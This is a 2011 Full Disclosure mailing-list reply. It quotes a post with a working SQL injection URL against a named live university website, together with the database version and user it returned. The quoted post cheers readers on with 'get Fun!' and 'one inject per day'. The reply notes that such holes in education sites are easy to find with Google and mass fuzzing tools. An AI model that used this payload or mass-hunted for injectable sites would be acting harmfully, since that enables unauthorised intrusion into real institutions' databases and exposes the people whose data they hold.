Full Disclosure: Re: inject sql in utn.edu.ar

Re: inject sql in utn.edu.ar

From: CnCxzSec衰仔 <cncxzhack () gmail com>
Date: Sat, 23 Apr 2011 19:57:08 +0800

many webmasters of these edu websites may not care about these vulns.
and that is easy to find tons of injections in edu-sites by using google and
the mass fuzzing tools.

On Sat, Apr 23, 2011 at 5:28 AM, injec7or hell <injec7or () gmail com> wrote:


http://www.frsf.utn.edu.ar/area/departamento.php?id=666/**/union/**/select/**/1,2,3,version(),user(),6--&stop=true

and the answer is ...

5.1.52
5.1.52
gweb () localhost

get Fun!

ps:one inject per day
ps2: has been reported and ignored by "THE" webmaster

Injec7or
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

inject sql in utn.edu.ar injec7or hell (Apr 22)
- Re: inject sql in utn.edu.ar CnCxzSec衰仔 (Apr 23)
  - Re: inject sql in utn.edu.ar fernando (Apr 23)
    - Re: inject sql in utn.edu.ar injec7or hell (Apr 23)